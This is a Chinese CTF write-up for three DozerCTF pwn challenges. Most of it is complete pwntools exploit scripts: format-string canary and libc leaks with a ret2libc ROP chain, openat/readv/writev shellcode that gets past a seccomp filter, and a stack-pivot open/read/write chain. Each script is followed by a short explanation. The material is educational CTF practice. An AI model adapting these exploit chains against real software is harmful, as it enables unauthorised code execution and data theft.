DozerCTF-PWN题解
这次比赛一共放了4道pwn题,3道栈上的,比较菜,只会做栈
1.pwn_fclose
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
io = remote('139.196.237.232',32985)
# io = process("./pwn")
libc = ELF("./libc.so.6")
payload = b"%35$p%37$p"
io.sendline(payload)
io.recvuntil(b"Hello ")
canary = int(io.recv(18), 16)
libc_base = int(io.recv(14), 16) - 0x21C87
print(f"libc_base: {hex(libc_base)}")
system = libc_base + libc.symbols["system"]
bin_sh = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi = libc_base + 0x2164f
ret = libc_base + 0x8aa
payload = b"a" * 0xc8 + p64(canary) + b"a" * 8 + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
# gdb.attach(io)
io.sendline(payload)
io.interactive()
开了canary和PIE,并且最后clode(1),clode(2)。不过问题不大,printf格式化字符串,泄露canary和libc地址,然后直接栈溢出getshell即可,注意栈平衡。后面就是执行exec 1>&0,就能拿flag了
2.mid_pwn
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF("./pwn")
# openat
shellcode_openat=asm(shellcraft.openat(-100,'./flag'))
shellcode = b"\x90" * 544 + shellcode_openat + asm('''
push 3
pop rdi
push 0x1 /* iov size */
pop rdx
push 0x100
lea rbx, [rsp-8]
push rbx
mov rsi, rsp
push SYS_readv
pop rax
syscall
push 1
pop rdi
push 0x1 /* iov size */
pop rdx
push 0x100
lea rbx, [rsp+8]
push rbx
mov rsi, rsp
push SYS_writev
pop rax
syscall
''')
# 运行shellcode
# p = process('./pwn')
p = remote("139.196.237.232", 33035)
# gdb.attach(p)
p.sendline(shellcode)
p.interactive()
禁用了open,read,write和其他特殊函数,例如sendfile之类,所以用openat,readv和writev读取,read到栈上读,不过它生成一个随机数再mod544,所以用nop滑板填充544字节即可
3.ez_pwn(我最想吐槽的
from pwn import *
from ctypes import *
io = remote("139.196.237.232", 33010)
# io = process("./pwn")
context(log_level='debug', arch='amd64', os='linux')
libc1 = CDLL("./libc.so.6")
libc = ELF("./libc.so.6")
elf = ELF("./pwn")
time = libc1.time(0)
pop_rdi = 0x4014d3
pop_rsi_r15 = 0x4014d1
ret = 0x401467
leave = 0x401341
libc1.srand(time)
v4 = libc1.rand()
io.send(b"1" * 0x20)
payload = str(v4).encode()
print(v4)
bss = elf.bss() + 0x200
io.sendline(payload)
# gdb.attach(io)
payload = (b"a" * 0x30 + p64(bss - 0x8) + p64(pop_rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(pop_rdi) + p64(bss)
+ p64(pop_rsi_r15) + p64(0x300) + p64(0) + p64(0x4012F2) + p64(leave))
io.sendline(payload)
io.recvuntil(b"~~\n")
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
# puts_addr=u64(io.recv(14).rjust(8,b'\x00'))
# puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
# io.clean()
pause()
print(hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
print(f"libc_base: {hex(libc_base)}")
system = libc_base + libc.sym["system"]
binsh=libc_base + next(libc.search(b"/bin/sh"))
pop_rsi_ret = libc_base + 0x2601f
pop_rax_ret = libc_base + 0x36174
pop_rdx_r12_ret = libc_base + 0x119431
one_gadget = libc_base + 0xe3b04
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
payload = p64(pop_rdi)
payload += p64(bss + 0x128)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(open_addr)
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi_ret)
payload += p64(0x404140)
payload += p64(pop_rdx_r12_ret)
payload += p64(0x100)
payload += p64(0)
payload += p64(read_addr)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi_ret)
payload += p64(0x404140)
payload += p64(pop_rdx_r12_ret)
payload += p64(0x100)
payload += p64(0)
payload += p64(write_addr)
payload += p64(0)*16
payload += b"./flag\x00\x00"
io.send(payload)
io.interactive()
这道题利用了libc的随机数,然后相等能让你进行一次read的溢出获取libc基地址,然后我试过填read的返回地址,结果因为read函数写的地址是由rbp-0x30所决定的,失败了,然后填start重新布局寄存器,却因为无法再次绕过随机数而无法进入栈溢出,然后发现有一个隐藏函数,里面有read,而且我们可以操控它的寄存器的值,所以就想用栈迁移来getshell,结果又不能执行system函数拿到shell,。。。好吧,只能上orw了。感觉这比前面的题难,为什么是ez,难道是我想复杂了??
第4道题目写的VM,不太了解